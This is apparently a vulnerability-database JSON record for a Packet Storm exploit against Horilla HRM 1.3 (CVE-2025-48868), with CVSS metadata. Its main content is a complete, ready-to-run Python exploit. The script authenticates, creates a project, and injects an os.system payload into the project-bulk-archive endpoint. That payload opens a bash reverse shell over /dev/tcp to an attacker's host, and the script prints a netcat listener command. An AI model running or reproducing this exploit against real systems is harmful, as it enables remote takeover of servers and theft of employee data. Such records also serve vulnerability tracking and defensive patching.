📄 Horilla 1.3 Remote Command Execution_PACKETSTORM:218656

{
    "lastseen": "2026-04-10T17:17:25",
    "description": "Horilla versions 1.3 and below suffer from a remote command execution vulnerability...",
    "published": "2026-04-10T00:00:00",
    "modified": "2026-04-10T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Horilla 1.3 Remote Command Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218656",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-48868"
    ],
    "sourceData": "# Exploit Title:  Horilla v1.3 - RCE\n    # Date: 2025-05-29\n    # Exploit Author: Raghad Abdallah Al-syouf\n    # Version: <= 1.3\n    # Tested on: Ubuntu / Docker\n    # CVE: CVE-2025-48868\n    \n    \n    Description:\n    This script exploits the authenticated RCE vulnerability CVE-2025-48868.\n    It logs into the target web app, creates a project, and sends payloads\n    to achieve a reverse shell connection to a listener **started manually** by the user.\n    \n    Usage:\n        python3 CVE_2025_48868.py --url http[s]://target:port --user username --pass password --lhost YOUR_IP --lport LISTENER_PORT\n    \n    Example:\n        python3 CVE_2025_48868.py --url http://127.0.0.1:8000 --user admin --pass admin --lhost 192.168.1.100 --lport 4444\n    \"\"\"\n    \n    import requests\n    import time\n    import sys\n    import argparse\n    from bs4 import BeautifulSoup\n    import urllib3\n    import random\n    import string\n    from datetime import datetime\n    \n    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n    \n    def generate_random_title():\n        letters = ''.join(random.choices(string.ascii_lowercase, k=4))\n        digits = ''.join(random.choices(string.digits, k=2))\n        return letters + digits\n    \n    def main():\n        print(\"[+] CVE-2025-48868\")\n    \n        parser = argparse.ArgumentParser(description='Exploit for CVE-2025-48868: Authenticated RCE in Horilla HRM software v1.3. Exploit by:Nakleh Said Zeidan')\n        parser.add_argument('--url', required=True, help='Target URL, e.g. http://localhost:8000')\n        parser.add_argument('--user', required=True, help='Username for login')\n        parser.add_argument('--pass', required=True, dest='password', help='Password for login')\n        parser.add_argument('--lhost', required=True, help='Attacker IP (listener must be started manually)')\n        parser.add_argument('--lport', required=True, type=int, help='Attacker port (listener must be started manually)')\n    \n        args = parser.parse_args()\n    \n        base_url = args.url.rstrip('/')\n        login_url = f\"{base_url}/login/\"\n        project_url = f\"{base_url}/project/project-bulk-archive\"\n        session = requests.Session()\n        headers = {\n            \"User-Agent\": \"Mozilla/5.0\",\n            \"X-Requested-With\": \"XMLHttpRequest\"\n        }\n    \n        print(\"[+] Getting login page...\")\n        login_page = session.get(login_url, headers=headers, verify=False)\n        if login_page.status_code != 200:\n            print(f\"[-] Failed to load login page, status {login_page.status_code}\")\n            sys.exit(1)\n    \n        soup = BeautifulSoup(login_page.text, 'html.parser')\n        csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']\n    \n        login_data = {\n            \"username\": args.user,\n            \"password\": args.password,\n            \"csrfmiddlewaretoken\": csrf_token\n        }\n    \n        print(\"[+] Logging in...\")\n        login_resp = session.post(login_url, data=login_data, headers=headers, verify=False)\n        if login_resp.status_code != 200 or \"logout\" not in login_resp.text.lower():\n            print(\"[-] Login failed\")\n            sys.exit(1)\n        print(\"[+] Logged in successfully!\")\n    \n        project_view_url = f\"{base_url}/project/project-view/\"\n        project_view = session.get(project_view_url, headers=headers, verify=False)\n        soup = BeautifulSoup(project_view.text, 'html.parser')\n        csrf_token = soup.find('input', {'name': 'csrfmiddlewaretoken'})['value']\n    \n        print(\"[+] Creating project...\")\n        create_project_url = f\"{base_url}/project/create-project?\"\n        today_str = datetime.now().strftime(\"%Y-%m-%d\")\n        random_title = generate_random_title()\n        multipart_data = {\n            \"is_active\": \"on\",\n            \"title\": random_title,\n            \"managers\": \"1\",\n            \"members\": \"1\",\n            \"status\": \"new\",\n            \"start_date\": today_str,\n            \"end_date\": today_str,\n            \"description\": \"Exploit project\"\n        }\n    \n        create_headers = {\n            \"User-Agent\": \"Mozilla/5.0\",\n            \"Accept\": \"*/*\",\n            \"Referer\": project_view_url,\n            \"HX-Request\": \"true\",\n            \"HX-Trigger\": \"hlvd701Form\",\n            \"HX-Target\": \"hlvd701Form\",\n            \"HX-Current-URL\": project_view_url,\n            \"X-CSRFToken\": csrf_token,\n            \"Origin\": base_url,\n            \"DNT\": \"1\",\n            \"Connection\": \"keep-alive\",\n        }\n    \n        create_resp = session.post(create_project_url, data=multipart_data, headers=create_headers, verify=False)\n        if create_resp.status_code == 200:\n            print(f\"[+] Project created successfully with title: {random_title}\")\n        else:\n            print(f\"[-] Project creation may have failed (status {create_resp.status_code}), continuing anyway...\")\n    \n        headers[\"Referer\"] = project_view_url\n        headers[\"Origin\"] = base_url\n        headers[\"Content-Type\"] = \"application/x-www-form-urlencoded; charset=UTF-8\"\n    \n        print(\"[*] Ensure your listener is running: `nc -lvnp {}`\".format(args.lport))\n        print(\"[+] Sending payload...\")\n    \n        i = 1\n        while True:\n            encoded_ids = f\"%5B%22{i}%22%5D\"\n            payload = f\"__import__('os').system('bash+-c+\\\"bash+-i+>%26+/dev/tcp/{args.lhost}/{args.lport}+0>%261\\\"')\"\n            exploit_url = f\"{project_url}?is_active={payload}\"\n            data = f\"csrfmiddlewaretoken={csrf_token}&ids={encoded_ids}\"\n            response = session.post(exploit_url, headers=headers, data=data, verify=False)\n    \n            if response.status_code == 200:\n                print(f\"[+] Payload sent for project id {i}. Waiting for shell...\")\n            else:\n                print(f\"[-] Error sending payload for project id {i} (status {response.status_code})\")\n    \n            time.sleep(3)\n            i += 1\n    \n    if __name__ == \"__main__\":\n        main()",
    "sourceHref": "https://packetstorm.news/download/218656",
    "cvss": {
        "score": 7.2,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218656/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}